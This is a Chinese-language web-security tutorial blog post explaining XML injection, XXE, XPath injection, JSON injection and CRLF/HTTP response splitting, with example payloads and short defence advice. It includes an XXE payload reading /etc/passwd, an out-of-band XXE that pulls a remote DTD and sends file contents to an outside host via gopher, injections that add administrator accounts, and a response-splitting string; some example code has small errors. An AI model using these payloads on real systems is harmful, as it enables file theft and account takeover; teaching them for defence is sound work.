WEB安全第五篇--其他注入的奇技淫巧:XML注入Xpath注入Json注入CRLF注入

Posted 挖洞的土拨鼠

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了WEB安全第五篇--其他注入的奇技淫巧:XML注入Xpath注入Json注入CRLF注入相关的知识,希望对你有一定的参考价值。

零、前言

  最近做专心web安全有一段时间了,但是目测后面的活会有些复杂,涉及到更多的中间件、底层安全、漏洞研究与安全建设等越来越复杂的东东,所以在这里想写一个系列关于web安全基础以及一些讨巧的payload技巧以便于备忘。不是大神、博客内容非常基础,如果真的有人看而且是大牛们,请不要喷我,欢迎指正我的错误(水平有限)。

一、XML注入:

  1、本质:

  XML是一种数据组织存储的数据结构方式,安全的XML在用户输入生成新的数据时候应该只能允许用户接受的数据,需要过滤掉一些可以改变XML标签也就是说改变XML结构插入新功能(例如新的账户信息,等于添加了账户)的特殊输入,如果没有过滤,则可以导致XML注入攻击。

  2、举例说明: 

 1 """
 2 原始组织数据如下:
 3 <USER role="guest">
 4 <name>user1</name>
 5 <password>uesr1</password>
 6 <email>[email protected]</email>
 7 </USER>
 8 用户本应提交的数据是user1 , user1 ,[email protected]
 9 如果用户提交的数据是
10 POST下
11 name = user1&passwd=user1&[email protected]</email></USER><USER role="admin"><name>attack</name><password>attack</password><email>[email protected]
12 就会导致生成一个新的管理员账户attack
13 """
 1 /*
 2 (1)有回显,直接读取文件
 3 */
 4 <?php 
 5     $xml=$GET[‘XML‘];
 6     $data = simplexml_load_string($xml);
 7     print_r($data);
 8 >
 9 /*
10 攻击请求get a.b.c.d?xml=<?xml version="1.0" encoding="utf-8"?><!DOCTYPE xxe [<!ELEMENT name ANY> <!ENTITY xxe SYSTEM "file:///etc/passwd">]> <root><name>&xxe;</name></root>
11 */
12 /*
13 (2)引用远程server上的XML文件 读取文件
14 */
15 /*#1.xml:
16 <!ENTITY % a SYSTEM "file:///etc/passwd">
17 <!ENTITY % b "<!ENTITY % c SYSTEM ‘gopher://xxe.com%a;‘>"> %b;%c
18 #payload
19 <?xml version="1.0" encoding="utf-8">
20 <!DOCTYPE root [
21 <!ENTITY % remote SYSTEM "http://192.168.106.208/1.xml">
22 %remote;]>
23 */
 1 <!--原始XML为:-->
 2 <?xml version="1.0" encoding="UTF-8"?>
 3 <adminuser>
 4 <admin id="1">
 5 <name>admin</name>
 6 <password>admin</passsword>
 7 </admin>
 8 </adminuser>
 9 <!--
10 例如攻击者可以修改password部分,则可以如下构造:
11 输入:
12 <admin></password></admin><admin id=2><name>test</name><password>test</password></admin>
13 那么XML文件则会变成:
14 -->
15 <?xml version="1.0" encoding="UTF-8"?>
16 <adminuser>
17 <admin id="1">
18 <name>admin</name>
19 <password>admin</passsword>
20 </admin>
21 <admin id="2">
22 <name>test</name>
23 <password>test</passsword>
24 </admin>
25 </adminuser>
26 <!--
27 增加了一个管理员权限账号。
28 -->

  3、危害:

    #常见攻击手段包括:

    #读取本地文件(可能包含敏感信息 /etc/shadow)

    #内存侵犯

    #任意代码执行

    #拒绝服务

  4、防御:   

    #对有改变XML结构的特殊输入进行过滤或者编码
    #filter list = ["&","<",">","‘".‘"‘,"/"]
    #在XML保存和展示之前都需要

二、Xpath注入:

  1、本质:

    #Xpath是类似SQL的一种从XML结构中搜索节点数据的语言(DSL),其注入放手就是构造完整可执行的DSL,本质与SQL注入一样。

  2、举例:    

    一般结构//nodename[ colunmname/colunmtype()="xxxxxx" and .......]
    例如:
      //USER [username/text()="admin" and password/text()="123456"]
    注入就是在引号内内容着手构造:
      例如password=> 111" or "2"="2

  3、防御:
    防御很简单,过滤特殊输入字符即可。

三、Json注入:

  1、本质:

  @json也是传输数据的一种格式,增加一个用户的json结构如下:

  {"adduser":[{"username":"admin1","password":"123456"}]},可以注入多增加一个 password=>123456"},{"username":"admin2","password":"123456

  2、防御:

    过滤关键字即可。

四、CRLF注入也叫HTTP响应截断:

  1、本质:

  也叫CRLF注入攻击。CR、LF分别对应回车(%0d)、换行(%0a)字符。HTTP头由很多被CRLF组合分离的行构成,每行的结构都是“键:值”。如果用户输入的值部分注入了CRLF字符,它就有可能改变HTTP报头结构。

  2、举例:假设数据部分是xss payload则会中招啊

 1 """
 2 (1)REQUEST-METHOD : GET
 3          URL : http://a.b.c.d/index.html?language=Chinense
 4          RESPONSE : 
 5               HTTP/1.1 302 Moved Temporarily GMT\r\n
 6               Date: ********
 7               Location:http://a.b.c.d/zhcn.html
 8               Server:******
 9               ******
10 (2)REQUEST-METHOD : GET
11          URL : http://a.b.c.d/index.html?language=Chinense%0d%0aContent-       Length%3a+%0d%0a%0d%0aHTTP%2f1.1+200+OK%0d%0aContent-Type%3a%+text%2fhtml%d%0aContent-Length%3a+24%0d%0a%3chtml%3eI%e2%80%99m+hacker!%3c%2fhtml%3e
12          实际上就是:
13          Chinese
14          Content-Length:0
15 
16          HTTP/1.1 200 OK
17          Content-Type:text/html
18          Content-Length:24
19 
20          <html>I‘m hacker!</html>
21 
22          RESPONSE : 
23               HTTP/1.1 302 Moved Temporarily GMT\r\n
24               Date: ********
25               Location:http://a.b.c.d/zhcn.html
26               Content-Length:0
27               
28               HTTP/1.1 200 OK
29               Content-Type:text/html
30               Content-Length:24
31              
32               <html>I‘m hacker!</html>
33               Server:******
34               ******
35 
36 37 修改编码格式,避免过滤函数过滤掉常用恶意payload符号的UTF-8,GBK,Unicode编码.
38 39 
40 当然可以不加新的http响应头,直接注入\r\n(CRLF)和payload
41 
42 常见的容易出问题的PHP函数
43 header()
44 setcookie()
45 session_id()
46 setrawcookie()
47 
48 位置:
49 location   -> 重定向到恶意地址
50 set-cookie -> 把自己数据写入cookie
51 """

  3、防御:

    限制用户输入的CR和LF,或者对CR和LF字符正确编码后再输出

 


以上是关于WEB安全第五篇--其他注入的奇技淫巧:XML注入Xpath注入Json注入CRLF注入的主要内容,如果未能解决你的问题,请参考以下文章

Web安全注入攻击

WEB安全——XML注入

Spring第五篇

Web安全:XML外部实体注入

C#反射与特性:设计一个仿ASP.NETCore依赖注入Web

网络安全从入门到精通 (第五章-3) MSSQL反弹注入